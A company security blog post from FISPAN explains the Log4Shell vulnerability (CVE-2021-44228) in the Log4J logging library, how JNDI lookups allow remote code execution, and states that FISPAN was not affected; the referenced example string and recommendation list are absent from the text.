Editor’s Note: FISPAN is currently not vulnerable to the Log4Shell (CVE-2021-44228) and has not identified any active exploits at this time.
On Friday, December 9, 2021, a vulnerability was first discovered in the popular video game Minecraft: a user could send a crafted message in the game’s chat window, enabling them to run arbitrary code (Remote Code Execution or RCE) on the server without authorization. This was found to be a vulnerability in Java's Apache library known as Log4J. Assigned a CVSS score of 10 out of 10, the highest possible score for a vulnerability, it is now officially known as CVE-2021-44228 and given the name Log4shell.
What is Log4J?
Log4J is a Java library for logging error messages in applications, a key part of Java’s logging framework, which is used in basically every Java application with logging enabled. It is used by everyone, from software developers who use it when debugging code to security professionals who use logging to keep track of what goes on in their environment.
This vulnerability is dangerous because the barrier to entry is very low — an exploit can be triggered by just sending a chat message or entering the exploit message in the search bar, and according to Java’s own installer, it currently runs in over 3 billion devices. From the Mars Rover to in-home smart fridges, everything somehow and somewhere relies on the code built around this library.
How Does the Log4shell Exploit Work?
The issue that caused this vulnerability is improper input validation, which is also part of the OWASP Top 10 Most common vulnerabilities. This means the input field does not check if the data is trusted. This exploitation is achieved by using a Java runtime interface called JNDI (Java Naming and Directory Interface). It has the ability to look up information locally or from remote servers. Any string in the following format can perform this lookup and fetch code that can be executed, hence the name "Remote Code Execution."
This list is not exhaustive as there are many possible recommendations available.
FISPAN’s Steps to Reduce Vulnerabilities
With FISPAN’s constant monitoring for security threats, we were notified about the new Zero-Day vulnerability promptly, and FISPAN immediately took preventative measures:
Based on our research, despite the usage of a vulnerable library, FISPAN was not affected by any of the published exploits, as FISPAN’s library was used in conjunction with up-to-date Java.
As this situation evolves rapidly, we can expect the intensity of attacks to only increase. Your best courses of action are to keep up to date with changes, stay vigilant and last but not least, follow security best practices.
Have Questions About Cyber Security?
Learn more about the state of commercial banking and security in this Security Boulevard article from FISPAN's own Head of Cyber Security, Maryam Hamidirad.
Our security team is also available to answer any questions you may have and can be reached at firstname.lastname@example.org.